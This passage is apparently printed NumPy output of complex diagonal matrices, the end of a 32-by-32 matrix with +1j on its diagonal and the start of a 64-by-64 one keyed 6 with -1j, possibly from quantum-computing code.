0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]),
6: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
